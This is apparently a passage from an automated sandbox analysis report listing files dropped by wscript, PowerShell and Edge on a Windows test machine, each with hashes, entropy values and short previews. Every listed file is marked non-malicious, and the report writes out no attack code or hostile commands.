                                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328
                                                                                                                                      Entropy (8bit):3.1292855227559158
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:kKHK9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:vlDnLNkPlE99SNxAhUe/3
                                                                                                                                      MD5:423B84F92F6CE25AF75CF02FA4BC0746
                                                                                                                                      SHA1:0F9E3828F8221975CCF57E07D9408486B59C0FCE
                                                                                                                                      SHA-256:74198F7C8E9857F9B404FBF31733F06318AC2F19EB25EC94EAC47C98D6D1CB09
                                                                                                                                      SHA-512:20FFCABEBF1EB2961078B9B69A29F9DA16A6EAADEC4D38BAF6A7820516789C2074660663339D60ACE9D9A5588A95E3DFE5300665476728ED83E50BBE88CFC0D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:p...... ..........WpzQ..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):8003
                                                                                                                                      Entropy (8bit):4.840877972214509
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:@...e................................................@..........

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0duhboa3.0h5.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4f23m5ou.xke.ps1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyucppu5.z20.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suelh1ya.icr.psm1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\296d411f-5601-4a13-8cfe-ac0b43c67158.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4213
                                                                                                                                      Entropy (8bit):5.4837279325483275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:0q8NkGS1fJvHK58rh/cI9URoDotolPB2svB8hwJkacASDS4S4SDSFe4a:/8NBST7eoDUA0hgka1
                                                                                                                                      MD5:464655605C386B291307BE90CFA1BDCE
                                                                                                                                      SHA1:FA52D876906AFF3A51C8DB129DCF15B6D267352F
                                                                                                                                      SHA-256:0579201CC37B3465173BAFB47C25E0F0B8AF9594B8901468A70DA43C3B31F541
                                                                                                                                      SHA-512:D40D6D4F02D8611338D4B898E6AFA36AB0872665059C5696593A9F4C82A4A7349D4A0436F5F0ECC15561D08D803681646033EEF2B2D2A52364D58C733878F386
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"dual_user":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyO

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\43dacac8-12ce-47d7-b520-5d299e9da6dc.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3297
                                                                                                                                      Entropy (8bit):5.589229754853718
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:0q8NkC1fJvHK8lB2svB8hwJkacASDS4S4SDSFe4a:/8NbTD0hgka1
                                                                                                                                      MD5:7505C4679C38CFA76EE64DD77561619F
                                                                                                                                      SHA1:CE75C6CB83E63C3DD1AC1C89CEA721C36EFD9F29
                                                                                                                                      SHA-256:3E73CA695155D18CFAD6F4CAEA0333D01EAFDF545DC3CF455EBCA9044120F23B
                                                                                                                                      SHA-512:7304873CBDDF85F74F890C5A1F24F545BEA194E4155384F6AD24BB4663295B7B07C267CBD7D4F99223FD14218BF3340D6498026D910FAC308A0DE036EBD67F2B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"dual_user":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADgkcD+PUfzTaQEYJBZbFyIEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABh/ZZPNGmo7nDY3+SdtpaRiTM9ej9eO7+r3J2aIaLbwwAAAAAOgAAAAAIAACAAAADpu5vk+8kldlHAJZ8QMj1+rbDJ6RfdcAc6oW2Odg90vTAAAADlrd2IAosf+BZyd84iZFZxJCTqGkBgUI1klaQjW23W1HD9aWGyVMMjadeO6RS0OURAAAAAJLDZG+M3MEm6bzd4ZPzXppp3EnaMck9lX/E+MdZo/HFNgJsA/PEvNJcXWRebbN1gdNlHaCTMrpAFdRpyOvUk1g=="},"policy":{"last_statist

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\BrowserMetrics\BrowserMetrics-67631446-12E0.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194304
                                                                                                                                      Entropy (8bit):0.22139090742705264
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:imzOikNEP8hisg/RGWNIFfxRGg1DRFF5qoRG8EWW6zb6ihK:im6iUEUUsgoWNIFfmg1HF5ql3yzJ
                                                                                                                                      MD5:F85AAC179B867F92A835F151F91F03FE
                                                                                                                                      SHA1:4894F79FFC533F1FDDA84B7C6F61D70E0EC1028A
                                                                                                                                      SHA-256:56C8A0E793D463CE6E18FB820751EC49FC754989B6FF4352F74E14DBDC9B2207
                                                                                                                                      SHA-512:71C89626BAA48C1EAC9FA406CAD4714F5F0D979A24B25A15923F6CF6DED01EAE65DA172DB0B5C81574CDD42C8BD1A141963E2B55DE9D649B13901792D7A37FFC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@..@...@.....C.].....@...............P..................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}..........117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".nitaav20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............>........................<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....p=.wA@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Crashpad\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):280
                                                                                                                                      Entropy (8bit):1.7488882183351082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:FiWWltlsFXo1NYlllllfx9Q5lS1Qi/:o1sFXo3YXT9oxi/
                                                                                                                                      MD5:6CEB58D9F14BEAD6F0D13A08499AAE0C
                                                                                                                                      SHA1:52075518E96AC6AC5B521DCBFDC17C03810320C8
                                                                                                                                      SHA-256:816FF4147BD9E32B8FC8B88C1809CC866936CDF11CCF127275C0383FCA960B91
                                                                                                                                      SHA-512:5D1ECE46EB94A42632B133019B1D22C8256F8D65971BC7DA4980F7477391E5D64F3F92699D340E31F7747EB978285D333E053C66D242301FC6D9F8FC70612715
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:sdPC.......................`.QM....R...................................................................................................................................................................................................f399e55c-fe8e-4877-8b9d-b7917f9550b1............

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Crashpad\throttle_store.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20
                                                                                                                                      Entropy (8bit):3.6219280948873624
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                      MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                      SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                      SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                      SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:level=none expiry=0.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\9e248cf3-b822-439f-b13c-2baf35ee113e.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Cache\Cache_Data\data_0

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:dBase III DBT, next free block index 3238316739, block length 1024
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45056
                                                                                                                                      Entropy (8bit):0.028917258126807864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsFl9tlGallBI+zI+tUkellLztq11VELE7+qil1ls+:/F3XGuU+zI+CkezztfEKqiNs+
                                                                                                                                      MD5:1AEC7D9C600999C242AA89195E3937E3
                                                                                                                                      SHA1:E98D1DCAB7B2731197D5E4FFC9C763E49B368A72
                                                                                                                                      SHA-256:53F1BDE4338C806E9ABCEFB03F3DC031895B5996CB175CEBA9B65E93B714AE5E
                                                                                                                                      SHA-512:E914318F4AC4CF52F0ED731FB5A7D1EC4BE66EB9EE75F293B9DFFD724A34AEAF23410DCCE6AA4234A842169F3DBA699F0F1057FB7823F96E5DEA6E2B9BE571CD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Cache\Cache_Data\data_1

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):270336
                                                                                                                                      Entropy (8bit):0.04387502861649165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:U/MmXXkZpLpg6L09RjTwYklHMpLpg6LASrJqknMtojpykcdCIRrYfhbtZPC93OHe:Jmn40ol0A2qknIoFkd/Rc1PCQHjTpM
                                                                                                                                      MD5:9BC35C73BFDB26E0492B4E31BBE3CA9C
                                                                                                                                      SHA1:3C9AF6F08FB42E82254572FF3E40A18CD0169FBD
                                                                                                                                      SHA-256:9823357920632A079375AFB13AB721B86211DEB2737B63E020E352F47F21DF0A
                                                                                                                                      SHA-512:55FDF6AC03FAAC65B89E81E7E215FD5D26FCC1C3D84D508155A8A216D32B572CBA057FCEA48B377AB805A0D2B0273C54B07DC127D462253889CE4BBCB29C5C60
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Cache\Cache_Data\data_2

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Cache\Cache_Data\data_3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8192
                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Cache\Cache_Data\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):524656
                                                                                                                                      Entropy (8bit):5.027445846313988E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Lsulde4/:LsS
                                                                                                                                      MD5:EDB40A4CAA4146589E06150F76731C36
                                                                                                                                      SHA1:8C132652FD3B59755E80786FD5373011360DD0A6
                                                                                                                                      SHA-256:CB2D67B22B78A6804F5A8598935F51364CFC06F8B54A9D57CE083F6788A493E1
                                                                                                                                      SHA-512:C6754973A2400B87760FC2EDABCC69FC05864ABD990C109E7B84BB9C6340F16DA51E5376CBD38888CEADCD81A7A640C02B3C4670E00EC5B1B23415B2EF624BB3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.........................................G..%./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\js\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24
                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0\r..m..................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48
                                                                                                                                      Entropy (8bit):2.9972243200613975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:cVC0ExvKln:cVqxW
                                                                                                                                      MD5:50F1FD3562564C7B819B240070EF0073
                                                                                                                                      SHA1:0FED21682516F8F96A510102EB3EE27D90AD9534
                                                                                                                                      SHA-256:316046051820FE3A2C3D799D12AAB071946145B22EF4A8E583631EA69BFE55B4
                                                                                                                                      SHA-512:E75BDF6161B36F6FFC34D503B3D2B06B38099504475C35456A1CA10C3B1BB72B6A7FDDA76B49D163D208A6A39E77F6334A1C3E055B494429E0FF6976C27043D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:(...A5.[oy retne........................mk..%./.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48
                                                                                                                                      Entropy (8bit):2.9972243200613975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:cVC0ExvKln:cVqxW
                                                                                                                                      MD5:50F1FD3562564C7B819B240070EF0073
                                                                                                                                      SHA1:0FED21682516F8F96A510102EB3EE27D90AD9534
                                                                                                                                      SHA-256:316046051820FE3A2C3D799D12AAB071946145B22EF4A8E583631EA69BFE55B4
                                                                                                                                      SHA-512:E75BDF6161B36F6FFC34D503B3D2B06B38099504475C35456A1CA10C3B1BB72B6A7FDDA76B49D163D208A6A39E77F6334A1C3E055B494429E0FF6976C27043D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:(...A5.[oy retne........................mk..%./.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Code Cache\wasm\index

                                                                                                                                      Download File
